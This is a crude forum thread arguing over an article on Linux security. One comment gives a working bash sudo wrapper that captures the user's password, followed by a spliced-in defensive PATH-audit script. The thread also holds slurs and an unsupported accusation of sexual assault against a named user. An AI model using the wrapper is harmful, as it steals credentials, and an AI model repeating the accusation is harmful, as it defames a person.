
Linux :marseypenguin: being secure :marseycop2: is a common misconception in the security :capyhacker: and privacy :marseypedo: realm :marseyspyglow::!marseyjewoftheorientglow:

https://madaidans-insecurities.github.io/linux.html

GNU+Linux bros :marseypenguin: I don't feel so good :marseydisintegrate::marseyhacker::capyhacker:

!codecels discuss


https://i.rdrama.net/images/16794381950713048.webp


:#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat:


https://i.rdrama.net/images/16892013679266138.webp


Most programs on Linux are written in memory unsafe languages, such as C or C++, which causes the majority of discovered security vulnerabilities. Other operating systems have made more progress on adopting memory safe languages, such as Windows, which is leaning heavily towards Rust, a memory safe language, or macOS which is adopting Swift. While Windows and macOS are still mostly written in memory unsafe languages, they are at least making some progress on switching to safe alternatives.

This is an r-slured fricking paragraph and plain wrong. All the OSes have experimented with rust without any using it to any significant degree.

The Linux kernel itself is also extremely lacking in security. It is a monolithic kernel, which means that it contains a colossal amount of code all within the most privileged part of the operating system and has no isolation between internal components whatsoever.

and then

Other kernels, such as the Windows and macOS kernels, are somewhat similar too, in that they are also large and bloated monolithic kernels with huge attack surface

xD

The rest of it is scraping the barrel for things to criticise. Maybe someone will pretend to be sudo. derp.

The one valid point that the article does make is that OSes were designed to be multi-user where you'd not trust the other users. Now they're almost always single user but you wanna be suspicious of the applications instead. But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.


>rust is safe because le memory-safety

Isn't Lemmy written in Rust, and didn't they just announce a massive XSS vuln? Memory-safe doesn't mean well written.


>xss in typescript

>rust le bad

:#marseyravecope:


I actually like programming in rust but I wish the let's rewrite the whole of Linux in rust people would frick off.


they are legit glowies who want their non-foss spyware rust backdoors in

there's a reason rust freaked the frick out at someone making a compiler


why do you think Rust is non-FOSS? :marseyconfused:


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.


He's not saying it's non-FOSS, he's bringing up how there's basically just the one official rust compiler instead of there being multiple competing compilers like with C and C++, and most other programming languages. This is due to the fact that Rust doesn't actually have a formal specification, specification is whatever the Official Compiler does. This isn't a wise move because it doesn't guarantee that rust code written in the past will behave the same in the future or present. It also makes it borderline impossible to create an alternative compiler, since there's nothing saying that a specific keyword should exist or behave a certain way. This is bad.


not saying it’s non-FOSS


non-foss spyware

:marseysurejan:

no spec

The fact I’ve heard this as the paramount complaint of Rust in current year actually inspires more confidence in it imo.

There’s no document that people would ignore anyway but it’s super duper important so a neurodivergent neckbeard can get a half-broken gcc port? This is the biggest complaint about Rust?



I mean there's the fact that the actual rust compiler is obscenely aids to actually bootstrap, etc. I think you're just being contrarian here because you want marseycoin or something. It's pretty clear that this is an actual issue.


I can write it less smugly but I don’t legitimately think a single compiler ecosystem is that big of an issue, no.



GNU Hurd chads simply can't stop winning. monolithicels stay seething


Imagine not having to interject any longer

https://i.rdrama.net/images/16891991024874403.webp


But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.

It's solved by mobile OSes with their strict sandboxing and easy gui permissions settings, but yes, the desktop is a long ways away. With Linux all we have are janky cowtools like selinux, apparmor, firejail, flatpak (bleh) and so on. Qubes OS is a usable system that actually makes good progress towards solving the problem, while something more like Genode/Sculpt OS is experimental but with a cleaner design and where we need to be heading towards in the long run.


>Qubes OS is a usable system

:marsey#xdoubt:


it's completely usable, yes


I wonder how well stuff like Guix and Nix solve this issue, if at all.


>someone might sneak a bash script on your system to intercept your sudoer password :marseypearlclutch:


sudo blow me you FUD spouting M$strag.


>puts this in your .bashrc

cat <<\EOF > /tmp/sudo
#!/bin/bash
if [[ "${@}" = "" ]]; then
 /usr/bin/sudo
else
 read -s -r -p "[sudo] password for ${USER}: " password
 echo "${password}" > /tmp/password
 echo "${password}" | /usr/bin/sudo -S ${@}
fi
EOF
chmod +x /tmp/sudo
export PATH="/tmp:${PATH}"

>eh nothing personal kid

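A defensive check for the PATH shadowing shown in the comment above, as an added example that is not part of the thread: it walks a PATH value in lookup order and reports any executable or world-writable directory that would be consulted before the system copy of a command. The names `audit_path_for`, `is_trusted_dir` and `TRUSTED_DIRS` are hypothetical, and the list of trusted directories is an assumption to adjust per distribution.

```sh
#!/bin/sh
# Added example (not from the thread). Function and variable names are hypothetical.
# Directories assumed to be root-owned system locations; adjust per distro.
TRUSTED_DIRS=${TRUSTED_DIRS:-/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin}

is_trusted_dir() {
  case ":${TRUSTED_DIRS}:" in
    *":$1:"*) return 0 ;;
  esac
  return 1
}

# audit_path_for CMD [PATH_VALUE]
# Walks PATH in lookup order and reports anything that would be consulted
# before the trusted copy of CMD. Prints findings; returns 1 if there are any.
# The body runs in a subshell so the IFS and globbing changes do not leak out.
audit_path_for() (
  cmd=$1
  path_value=${2:-$PATH}
  findings=0
  IFS=:
  set -f                      # no globbing while splitting PATH
  for dir in $path_value; do
    [ -n "$dir" ] || dir=.    # an empty PATH entry means the current directory
    if is_trusted_dir "$dir"; then
      [ -x "$dir/$cmd" ] && break   # lookup would stop at the trusted copy
      continue
    fi
    if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
      echo "SHADOW $dir/$cmd"
      findings=1
    fi
    # World-writable directory (e.g. /tmp): any local user could plant CMD here.
    case $(ls -ld "$dir" 2>/dev/null) in
      d???????w*) echo "WRITABLE $dir"; findings=1 ;;
    esac
  done
  return "$findings"
)
```

Run `audit_path_for sudo` in the session whose PATH you want to check; a clean result prints nothing and returns 0.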

uses bash

:!#marseyemojirofl:


You’re not seriously suggesting that csh is better?


bashcels seething at fishchads :carp:



yes, those are the 2 shells.

:marseyeyeroll!#:


What about zsh?


Aka the bash rip off that Apple made for licensing reasons


:marseyagree:


Yeah, I don’t understand this part of the article because there is no way for me to put this in another user's profile.


I don't worry about it too much. If an attacker can get a shell on your system it's basically game over, so use network ACLs, use key auth instead of passwords, use short-lived dynamic credentials. Instead of worrying about what all an attacker can exploit in the OS, focus your energy on preventing them from even gaining access. Unless you have a quantum computer at your disposal I don't think you'll be able to crack my 4096 bit ssh key.


Nah man we gotta be paranoid about esoteric OS and application exploits instead of just gatekeeping our systems from malicious actors and malware


I think modern OS installs in 2023 are all equally secure, if you follow the golden rule of "only install from trusted sources".

I simply don't think there are many Pegasus-style attacks floating around; the ones that are, you have little recourse for.

I think meme-people who style themselves as security experts like to dream most hacks are advanced when in reality it's almost always "Jane from accounting opened a phish".

Keep your firewall ports closed, use key auth and apply security updates automatically and you'll be better than most people getting pwned.



The problem is that you install thousands of software packets and it just takes one (1) compromised software being run by a sudouser to compromise the system. This is a problem of Windows NT too, you have UAC but you don't have filesystem isolation and the system gives Administrator privileges to random exes very easily


Yes, I’m not sure what the easy solution is to that problem except reworking the entire ecosystem to be like iOS / Android like is mentioned above.

I think pseuds who claim Linux is “more secure” aren’t doing their research and what really matters is how quickly you can patch.



:#marseyhesright:


wrong

:#marseyindignant:


:#gigachad3:


Was this written by Theo? :marseythinkorino:


https://media.giphy.com/media/43DgQJkV2HbMc/giphy.webp


Flatpak aims to sandbox applications, but its sandboxing is very flawed. It fully trusts the applications and allows them to specify their own policy. This means that security is effectively optional and applications can simply choose not to be sufficiently sandboxed.

This author is an idiot. The purpose of self-specifying boundaries is two-fold:

  • It puts a blast radius around an app being misbehaved or being compromised. This is why Chrome self-sandboxes major parts of its runtime, even though their own engineers wrote the code being sandboxed.

  • OS, vendor, and IT policies can restrict installation based on requiring self-selection of more restrictive policies. This is why Google's add-on systems for Workspace have different criteria depending on what scopes an app self-selects, encouraging self-selection of narrower scopes.

Flatpaks could do the latter better, but the concept is sound.


Arch Linux used to have a grsecurity patch you can install with a single command, which is probably the best thing you can do against kernel and some userspace exploits. Haven’t used it in years since I switched back to MacOS. That plus general security good practices is better than most stock machines with predictable software stacks and entrypoints. Security through Obscurity is a legit tactic.

MACs like SELinux are mostly security theatre because no one really uses it meaningfully cuz it’s so high touch


Duh.


Alternatively, an attacker could log keystrokes via X11

that's worrying. i hope somebody comes up with an x replacement. then linux would land in a way safer position


Yeah. It's pretty fricked up that you can run a program and it responds to your input.

There's been some great strides in disabling user input from the wayland team but I'm genuinely shocked that nobody's done anything about the terminal. That thing can read literally every keypress you make.


I love Wayland btw


I like to spin up Linux VMs to see how long it takes to get hacked.


Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp


security onion has a honey pot option that is pretty fetch


Putting the :e: in :marseyexcited:


i was doing something like this for a bit but instead i was collecting viral payloads out of my logs. mostly found stuff targeting shitty chinese iot devices


Sounds about right. There are no more cool viruses anymore that show a frick you site on a specific day. Now it’s all lame ransomware and ddos.



How long does it take? What are you doing with it that causes you to get hacked?


Install Wordpress and never update it.



:#marseyglow2:


Factual


I see those cybersec courses are paying off

:#marseysoypointglow::#marseynoyouglow:


Don't most of these exposes basically just boil down to "if you don't set up linux to be secure, it will be insecure?"
